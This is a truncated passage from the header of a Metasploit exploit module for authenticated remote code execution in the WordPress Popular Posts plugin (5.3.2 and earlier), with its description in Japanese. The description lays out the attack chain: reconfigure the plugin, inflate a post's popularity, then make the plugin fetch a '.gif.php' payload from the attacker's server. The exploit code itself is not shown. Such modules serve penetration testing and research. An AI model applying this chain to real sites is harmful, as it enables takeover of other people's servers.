
### このモジュールには Metasploit が必要です: https://metasploit.com/download # 現在のソース: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ このエクスプロイトを使用するには、Metasploit に FQDN が設定されており、ポート 80、443、または 8080 でペイロード用の Web サーバーを実行できる必要があります。 また、FQDN は予約済みアドレス (192/172/127/10) に解決されてはなりません。さらに、サーバーは GET リクエストを受け取る前に、ペイロードに対する HEAD リクエストにも応答する必要があります。 このエクスプロイトは、Wordpress プラグイン Popular Posts <= 5.3.2 における認証済みの不適切な入力検証を悪用します。 このエクスプロイトチェーンはかなり複雑です。認証が必要で、サーバーには PHP 用の 'gd' も必要です。 次に、Popular Post プラグインが再設定され、ウィジェット内の投稿画像に任意の URL を指定できるようにします。 投稿が作成され、その投稿が以前の 1 位を 5 上回る人気になるまでリクエストが送信されます。投稿がトップ 5 に入り、 60 秒 (当方では 90 秒待機) のサーバーキャッシュの更新が行われた後、ホームページのウィジェットが読み込まれ、 プラグインが当方のサーバーからペイロードをダウンロードするようにトリガーされます。ペイロードには 'GIF' ヘッダーと 二重拡張子 ('.gif.php') が含まれるため、任意の PHP コードを実行できます。 }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wo